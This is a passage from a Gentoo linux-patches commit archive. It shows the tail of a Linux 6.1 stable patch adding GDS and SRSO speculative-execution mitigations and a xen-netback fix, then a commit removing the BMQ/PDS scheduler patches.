++	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+@@ -1670,6 +1672,9 @@ static u64 kvm_get_arch_capabilities(void)
+ 		 */
+ 	}
+ 
++	if (!boot_cpu_has_bug(X86_BUG_GDS) || gds_ucode_mitigated())
++		data |= ARCH_CAP_GDS_NO;
++
+ 	return data;
+ }
+ 
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 841955dc2573d..30e76fab678a5 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -9,6 +9,7 @@
+ #include <asm/nospec-branch.h>
+ #include <asm/unwind_hints.h>
+ #include <asm/frame.h>
++#include <asm/nops.h>
+ 
+ 	.section .text.__x86.indirect_thunk
+ 
+@@ -74,6 +75,46 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  */
+ #ifdef CONFIG_RETHUNK
+ 
++/*
++ * srso_untrain_ret_alias() and srso_safe_ret_alias() are placed at
++ * special addresses:
++ *
++ * - srso_untrain_ret_alias() is 2M aligned
++ * - srso_safe_ret_alias() is also in the same 2M page but bits 2, 8, 14
++ * and 20 in its virtual address are set (while those bits in the
++ * srso_untrain_ret_alias() function are cleared).
++ *
++ * This guarantees that those two addresses will alias in the branch
++ * target buffer of Zen3/4 generations, leading to any potential
++ * poisoned entries at that BTB slot to get evicted.
++ *
++ * As a result, srso_safe_ret_alias() becomes a safe return.
++ */
++#ifdef CONFIG_CPU_SRSO
++	.section .text.__x86.rethunk_untrain
++
++SYM_START(srso_untrain_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
++	ASM_NOP2
++	lfence
++	jmp __x86_return_thunk
++SYM_FUNC_END(srso_untrain_ret_alias)
++__EXPORT_THUNK(srso_untrain_ret_alias)
++
++	.section .text.__x86.rethunk_safe
++#endif
++
++/* Needs a definition for the __x86_return_thunk alternative below. */
++SYM_START(srso_safe_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++#ifdef CONFIG_CPU_SRSO
++	add $8, %_ASM_SP
++	UNWIND_HINT_FUNC
++#endif
++	ANNOTATE_UNRET_SAFE
++	ret
++	int3
++SYM_FUNC_END(srso_safe_ret_alias)
++
+ 	.section .text.__x86.return_thunk
+ 
+ /*
+@@ -86,7 +127,7 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  *    from re-poisioning the BTB prediction.
+  */
+ 	.align 64
+-	.skip 63, 0xcc
++	.skip 64 - (__ret - zen_untrain_ret), 0xcc
+ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	/*
+@@ -118,10 +159,10 @@ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	 * evicted, __x86_return_thunk will suffer Straight Line Speculation
+ 	 * which will be contained safely by the INT3.
+ 	 */
+-SYM_INNER_LABEL(__x86_return_thunk, SYM_L_GLOBAL)
++SYM_INNER_LABEL(__ret, SYM_L_GLOBAL)
+ 	ret
+ 	int3
+-SYM_CODE_END(__x86_return_thunk)
++SYM_CODE_END(__ret)
+ 
+ 	/*
+ 	 * Ensure the TEST decoding / BTB invalidation is complete.
+@@ -132,11 +173,45 @@ SYM_CODE_END(__x86_return_thunk)
+ 	 * Jump back and execute the RET in the middle of the TEST instruction.
+ 	 * INT3 is for SLS protection.
+ 	 */
+-	jmp __x86_return_thunk
++	jmp __ret
+ 	int3
+ SYM_FUNC_END(zen_untrain_ret)
+ __EXPORT_THUNK(zen_untrain_ret)
+ 
++/*
++ * SRSO untraining sequence for Zen1/2, similar to zen_untrain_ret()
++ * above. On kernel entry, srso_untrain_ret() is executed which is a
++ *
++ * movabs $0xccccccc308c48348,%rax
++ *
++ * and when the return thunk executes the inner label srso_safe_ret()
++ * later, it is a stack manipulation and a RET which is mispredicted and
++ * thus a "safe" one to use.
++ */
++	.align 64
++	.skip 64 - (srso_safe_ret - srso_untrain_ret), 0xcc
++SYM_START(srso_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
++	.byte 0x48, 0xb8
++
++SYM_INNER_LABEL(srso_safe_ret, SYM_L_GLOBAL)
++	add $8, %_ASM_SP
++	ret
++	int3
++	int3
++	int3
++	lfence
++	call srso_safe_ret
++	int3
++SYM_CODE_END(srso_safe_ret)
++SYM_FUNC_END(srso_untrain_ret)
++__EXPORT_THUNK(srso_untrain_ret)
++
++SYM_FUNC_START(__x86_return_thunk)
++	ALTERNATIVE_2 "jmp __ret", "call srso_safe_ret", X86_FEATURE_SRSO, \
++			"call srso_safe_ret_alias", X86_FEATURE_SRSO_ALIAS
++	int3
++SYM_CODE_END(__x86_return_thunk)
+ EXPORT_SYMBOL(__x86_return_thunk)
+ 
+ #endif /* CONFIG_RETHUNK */
+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 0d5ccea2538fc..913287b9340c9 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -27,6 +27,7 @@
+ #include <asm/pti.h>
+ #include <asm/text-patching.h>
+ #include <asm/memtype.h>
++#include <asm/paravirt.h>
+ 
+ /*
+  * We need to define the tracepoints somewhere, and tlb.c
+@@ -826,9 +827,12 @@ void __init poking_init(void)
+ 	spinlock_t *ptl;
+ 	pte_t *ptep;
+ 
+-	poking_mm = copy_init_mm();
++	poking_mm = mm_alloc();
+ 	BUG_ON(!poking_mm);
+ 
++	/* Xen PV guests need the PGD to be pinned. */
++	paravirt_arch_dup_mmap(NULL, poking_mm);
++
+ 	/*
+ 	 * Randomize the poking address, but make sure that the following page
+ 	 * will be mapped at the same PMD. We need 2 pages, so find space for 3,
+diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
+index 6175f2c5c8224..e97bab7b00100 100644
+--- a/arch/x86/xen/smp_pv.c
++++ b/arch/x86/xen/smp_pv.c
+@@ -63,6 +63,7 @@ static void cpu_bringup(void)
+ 
+ 	cr4_init();
+ 	cpu_init();
++	fpu__init_cpu();
+ 	touch_softlockup_watchdog();
+ 
+ 	/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
+diff --git a/arch/xtensa/include/asm/bugs.h b/arch/xtensa/include/asm/bugs.h
+deleted file mode 100644
+index 69b29d1982494..0000000000000
+--- a/arch/xtensa/include/asm/bugs.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/*
+- * include/asm-xtensa/bugs.h
+- *
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Xtensa processors don't have any bugs.  :)
+- *
+- * This file is subject to the terms and conditions of the GNU General
+- * Public License.  See the file "COPYING" in the main directory of
+- * this archive for more details.
+- */
+-
+-#ifndef _XTENSA_BUGS_H
+-#define _XTENSA_BUGS_H
+-
+-static void check_bugs(void) { }
+-
+-#endif /* _XTENSA_BUGS_H */
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 7af8e33735a36..dab70a65377c8 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -577,6 +577,18 @@ ssize_t __weak cpu_show_retbleed(struct device *dev,
+ 	return sysfs_emit(buf, "Not affected\n");
+ }
+ 
++ssize_t __weak cpu_show_gds(struct device *dev,
++			    struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
++ssize_t __weak cpu_show_spec_rstack_overflow(struct device *dev,
++					     struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
+ static DEVICE_ATTR(meltdown, 0444, cpu_show_meltdown, NULL);
+ static DEVICE_ATTR(spectre_v1, 0444, cpu_show_spectre_v1, NULL);
+ static DEVICE_ATTR(spectre_v2, 0444, cpu_show_spectre_v2, NULL);
+@@ -588,6 +600,8 @@ static DEVICE_ATTR(itlb_multihit, 0444, cpu_show_itlb_multihit, NULL);
+ static DEVICE_ATTR(srbds, 0444, cpu_show_srbds, NULL);
+ static DEVICE_ATTR(mmio_stale_data, 0444, cpu_show_mmio_stale_data, NULL);
+ static DEVICE_ATTR(retbleed, 0444, cpu_show_retbleed, NULL);
++static DEVICE_ATTR(gather_data_sampling, 0444, cpu_show_gds, NULL);
++static DEVICE_ATTR(spec_rstack_overflow, 0444, cpu_show_spec_rstack_overflow, NULL);
+ 
+ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_meltdown.attr,
+@@ -601,6 +615,8 @@ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_srbds.attr,
+ 	&dev_attr_mmio_stale_data.attr,
+ 	&dev_attr_retbleed.attr,
++	&dev_attr_gather_data_sampling.attr,
++	&dev_attr_spec_rstack_overflow.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index c35c085dbc877..c3a8d78a41a7b 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -396,7 +396,7 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	struct gnttab_map_grant_ref *gop = queue->tx_map_ops + *map_ops;
+ 	struct xen_netif_tx_request *txp = first;
+ 
+-	nr_slots = shinfo->nr_frags + 1;
++	nr_slots = shinfo->nr_frags + frag_overflow + 1;
+ 
+ 	copy_count(skb) = 0;
+ 	XENVIF_TX_CB(skb)->split_mask = 0;
+@@ -462,8 +462,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		}
+ 	}
+ 
+-	for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+-	     shinfo->nr_frags++, gop++) {
++	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
++	     shinfo->nr_frags++, gop++, nr_slots--) {
+ 		index = pending_index(queue->pending_cons++);
+ 		pending_idx = queue->pending_ring[index];
+ 		xenvif_tx_create_map_op(queue, pending_idx, txp,
+@@ -476,12 +476,12 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			txp++;
+ 	}
+ 
+-	if (frag_overflow) {
++	if (nr_slots > 0) {
+ 
+ 		shinfo = skb_shinfo(nskb);
+ 		frags = shinfo->frags;
+ 
+-		for (shinfo->nr_frags = 0; shinfo->nr_frags < frag_overflow;
++		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+ 		     shinfo->nr_frags++, txp++, gop++) {
+ 			index = pending_index(queue->pending_cons++);
+ 			pending_idx = queue->pending_ring[index];
+@@ -492,6 +492,11 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		}
+ 
+ 		skb_shinfo(skb)->frag_list = nskb;
++	} else if (nskb) {
++		/* A frag_list skb was allocated but it is no longer needed
++		 * because enough slots were converted to copy ops above.
++		 */
++		kfree_skb(nskb);
+ 	}
+ 
+ 	(*copy_ops) = cop - queue->tx_copy_ops;
+diff --git a/include/asm-generic/bugs.h b/include/asm-generic/bugs.h
+deleted file mode 100644
+index 69021830f078d..0000000000000
+--- a/include/asm-generic/bugs.h
++++ /dev/null
+@@ -1,11 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __ASM_GENERIC_BUGS_H
+-#define __ASM_GENERIC_BUGS_H
+-/*
+- * This file is included by 'init/main.c' to check for
+- * architecture-dependent bugs.
+- */
+-
+-static inline void check_bugs(void) { }
+-
+-#endif	/* __ASM_GENERIC_BUGS_H */
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index 314802f98b9da..f98cfe9f188f5 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -70,6 +70,8 @@ extern ssize_t cpu_show_mmio_stale_data(struct device *dev,
+ 					char *buf);
+ extern ssize_t cpu_show_retbleed(struct device *dev,
+ 				 struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
++					     struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+@@ -187,6 +189,12 @@ void arch_cpu_idle_enter(void);
+ void arch_cpu_idle_exit(void);
+ void arch_cpu_idle_dead(void);
+ 
++#ifdef CONFIG_ARCH_HAS_CPU_FINALIZE_INIT
++void arch_cpu_finalize_init(void);
++#else
++static inline void arch_cpu_finalize_init(void) { }
++#endif
++
+ int cpu_report_state(int cpu);
+ int cpu_check_up_prepare(int cpu);
+ void cpu_set_state_online(int cpu);
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index d6c48163c6def..357e0068497c1 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -65,6 +65,7 @@ extern void sched_dead(struct task_struct *p);
+ void __noreturn do_task_dead(void);
+ void __noreturn make_task_dead(int signr);
+ 
++extern void mm_cache_init(void);
+ extern void proc_caches_init(void);
+ 
+ extern void fork_init(void);
+@@ -90,7 +91,6 @@ extern void exit_itimers(struct task_struct *);
+ extern pid_t kernel_clone(struct kernel_clone_args *kargs);
+ struct task_struct *create_io_thread(int (*fn)(void *), void *arg, int node);
+ struct task_struct *fork_idle(int);
+-struct mm_struct *copy_init_mm(void);
+ extern pid_t kernel_thread(int (*fn)(void *), void *arg, unsigned long flags);
+ extern pid_t user_mode_thread(int (*fn)(void *), void *arg, unsigned long flags);
+ extern long kernel_wait4(pid_t, int __user *, int, struct rusage *);
+diff --git a/init/main.c b/init/main.c
+index aa21add5f7c54..fe378351e8a95 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -96,7 +96,6 @@
+ #include <linux/cache.h>
+ #include <linux/rodata_test.h>
+ #include <linux/jump_label.h>
+-#include <linux/mem_encrypt.h>
+ #include <linux/kcsan.h>
+ #include <linux/init_syscalls.h>
+ #include <linux/stackdepot.h>
+@@ -104,7 +103,6 @@
+ #include <net/net_namespace.h>
+ 
+ #include <asm/io.h>
+-#include <asm/bugs.h>
+ #include <asm/setup.h>
+ #include <asm/sections.h>
+ #include <asm/cacheflush.h>
+@@ -781,8 +779,6 @@ void __init __weak thread_stack_cache_init(void)
+ }
+ #endif
+ 
+-void __init __weak mem_encrypt_init(void) { }
+-
+ void __init __weak poking_init(void) { }
+ 
+ void __init __weak pgtable_cache_init(void) { }
+@@ -860,6 +856,7 @@ static void __init mm_init(void)
+ 	/* Should be run after espfix64 is set up. */
+ 	pti_init();
+ 	kmsan_init_runtime();
++	mm_cache_init();
+ }
+ 
+ #ifdef CONFIG_RANDOMIZE_KSTACK_OFFSET
+@@ -995,7 +992,7 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	sort_main_extable();
+ 	trap_init();
+ 	mm_init();
+-
++	poking_init();
+ 	ftrace_init();
+ 
+ 	/* trace_printk can be enabled here */
+@@ -1084,14 +1081,6 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	 */
+ 	locking_selftest();
+ 
+-	/*
+-	 * This needs to be called before any devices perform DMA
+-	 * operations that might use the SWIOTLB bounce buffers. It will
+-	 * mark the bounce buffers as decrypted so that their usage will
+-	 * not cause "plain-text" data to be decrypted when accessed.
+-	 */
+-	mem_encrypt_init();
+-
+ #ifdef CONFIG_BLK_DEV_INITRD
+ 	if (initrd_start && !initrd_below_start_ok &&
+ 	    page_to_pfn(virt_to_page((void *)initrd_start)) < min_low_pfn) {
+@@ -1108,6 +1097,9 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 		late_time_init();
+ 	sched_clock_init();
+ 	calibrate_delay();
++
++	arch_cpu_finalize_init();
++
+ 	pid_idr_init();
+ 	anon_vma_init();
+ #ifdef CONFIG_X86
+@@ -1134,9 +1126,6 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	taskstats_init_early();
+ 	delayacct_init();
+ 
+-	poking_init();
+-	check_bugs();
+-
+ 	acpi_subsystem_init();
+ 	arch_post_acpi_subsys_init();
+ 	kcsan_init();
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 6bb91fbbf73cc..41950ff90aa34 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2600,11 +2600,6 @@ struct task_struct * __init fork_idle(int cpu)
+ 	return task;
+ }
+ 
+-struct mm_struct *copy_init_mm(void)
+-{
+-	return dup_mm(NULL, &init_mm);
+-}
+-
+ /*
+  * This is like kernel_clone(), but shaved down and tailored to just
+  * creating io_uring workers. It returns a created task, or an error pointer.
+@@ -3023,10 +3018,27 @@ static void sighand_ctor(void *data)
+ 	init_waitqueue_head(&sighand->signalfd_wqh);
+ }
+ 
+-void __init proc_caches_init(void)
++void __init mm_cache_init(void)
+ {
+ 	unsigned int mm_size;
+ 
++	/*
++	 * The mm_cpumask is located at the end of mm_struct, and is
++	 * dynamically sized based on the maximum CPU number this system
++	 * can have, taking hotplug into account (nr_cpu_ids).
++	 */
++	mm_size = sizeof(struct mm_struct) + cpumask_size();
++
++	mm_cachep = kmem_cache_create_usercopy("mm_struct",
++			mm_size, ARCH_MIN_MMSTRUCT_ALIGN,
++			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
++			offsetof(struct mm_struct, saved_auxv),
++			sizeof_field(struct mm_struct, saved_auxv),
++			NULL);
++}
++
++void __init proc_caches_init(void)
++{
+ 	sighand_cachep = kmem_cache_create("sighand_cache",
+ 			sizeof(struct sighand_struct), 0,
+ 			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_TYPESAFE_BY_RCU|
+@@ -3044,19 +3056,6 @@ void __init proc_caches_init(void)
+ 			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
+ 			NULL);
+ 
+-	/*
+-	 * The mm_cpumask is located at the end of mm_struct, and is
+-	 * dynamically sized based on the maximum CPU number this system
+-	 * can have, taking hotplug into account (nr_cpu_ids).
+-	 */
+-	mm_size = sizeof(struct mm_struct) + cpumask_size();
+-
+-	mm_cachep = kmem_cache_create_usercopy("mm_struct",
+-			mm_size, ARCH_MIN_MMSTRUCT_ALIGN,
+-			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
+-			offsetof(struct mm_struct, saved_auxv),
+-			sizeof_field(struct mm_struct, saved_auxv),
+-			NULL);
+ 	vm_area_cachep = KMEM_CACHE(vm_area_struct, SLAB_PANIC|SLAB_ACCOUNT);
+ 	mmap_init();
+ 	nsproxy_cache_init();
+diff --git a/tools/arch/x86/include/asm/cpufeatures.h b/tools/arch/x86/include/asm/cpufeatures.h
+index b71f4f2ecdd57..9ecc62861194e 100644
+--- a/tools/arch/x86/include/asm/cpufeatures.h
++++ b/tools/arch/x86/include/asm/cpufeatures.h
+@@ -14,7 +14,7 @@
+  * Defines x86 CPU feature bits
+  */
+ #define NCAPINTS			20	   /* N 32-bit words worth of info */
+-#define NBUGINTS			1	   /* N 32-bit bug flags */
++#define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+  * Note: If the comment begins with a quoted string, that string is used
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index 1c253b4b7ce00..a60c5efe34b36 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -796,5 +796,8 @@ bool arch_is_retpoline(struct symbol *sym)
+ 
+ bool arch_is_rethunk(struct symbol *sym)
+ {
+-	return !strcmp(sym->name, "__x86_return_thunk");
++	return !strcmp(sym->name, "__x86_return_thunk") ||
++	       !strcmp(sym->name, "srso_untrain_ret") ||
++	       !strcmp(sym->name, "srso_safe_ret") ||
++	       !strcmp(sym->name, "__ret");
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-03 11:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-03 11:54 UTC (permalink / raw
  To: gentoo-commits

commit:     874091cbd6a9ed3a2e6b82d58d43242931b17e5e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug  3 11:53:58 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug  3 11:53:58 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=874091cb

Remove BMQ for incompatibilities

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |    12 -
 ...MQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch | 10154 -------------------
 5021_BMQ-and-PDS-gentoo-defaults.patch             |    13 -
 5022_BMQ-and-PDS-remove-psi-support.patch          |    94 -
 4 files changed, 10273 deletions(-)

diff --git a/0000_README b/0000_README
index a70a1aed..c3798828 100644
--- a/0000_README
+++ b/0000_README
@@ -262,15 +262,3 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
-From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
-
-Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
-From:   https://gitweb.gentoo.org/proj/linux-patches.git/
-Desc:   Set defaults for BMQ. Add archs as people test, default to N
-
-Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
-From:   https://gitweb.gentoo.org/proj/linux-patches.git/
-Desc:   Sched/alt: Remove psi support 

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
deleted file mode 100644
index 7c2a77d3..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
+++ /dev/null
@@ -1,10154 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
- 
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
- 
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
- 
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield calls
-+to sched_yield will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
-+and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
-+simple, while efficiency and scalable for interactive tasks, such as desktop,
-+movie playback and gaming etc.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
-+each CPU is responsible for scheduling the tasks that are putting into it's
-+run queue.
-+
-+The run queue is a set of priority queues. Note that these queues are fifo
-+queue for non-rt tasks or priority queue for rt tasks in data structure. See
-+BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
-+that most applications are non-rt tasks. No matter the queue is fifo or
-+priority, In each queue is an ordered list of runnable tasks awaiting execution
-+and the data structures are the same. When it is time for a new task to run,
-+the scheduler simply looks the lowest numbered queueue that contains a task,
-+and runs the first task from the head of that queue. And per CPU idle task is
-+also in the run queue, so the scheduler can always find a task to run on from
-+its run queue.
-+
-+Each task will assigned the same timeslice(default 4ms) when it is picked to
-+start running. Task will be reinserted at the end of the appropriate priority
-+queue when it uses its whole timeslice. When the scheduler selects a new task
-+from the priority queue it sets the CPU's preemption timer for the remainder of
-+the previous timeslice. When that timer fires the scheduler will stop execution
-+on that task, select another task and start over again.
-+
-+If a task blocks waiting for a shared resource then it's taken out of its
-+priority queue and is placed in a wait queue for the shared resource. When it
-+is unblocked it will be reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
-+mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
-+NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
-+policy.
-+
-+DEADLINE
-+	It is squashed as priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in BMQ run queue designed. The
-+complexity of insert operation is O(n). BMQ is not designed for system runs
-+with major rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
-+NORMAL policy tasks, but they just don't boost. To control the priority of
-+NORMAL/BATCH/IDLE tasks, simply use nice level.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
-+task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priority from 0-99. For non-rt tasks, there are three different
-+factors used to determine the effective priority of a task. The effective
-+priority being what is used to determine which queue it will be in.
-+
-+The first factor is simply the task’s static priority. Which is assigned from
-+task's nice level, within [-20, 19] in userland's point of view and [0, 39]
-+internally.
-+
-+The second factor is the priority boost. This is a value bounded between
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
-+modified by the following cases:
-+
-+*When a thread has used up its entire timeslice, always deboost its boost by
-+increasing by one.
-+*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
-+and its switch-in time(time after last switch and run) below the thredhold
-+based on its priority boost, will boost its boost by decreasing by one buti is
-+capped at 0 (won’t go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
- 
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
- 
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
- 
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
- 
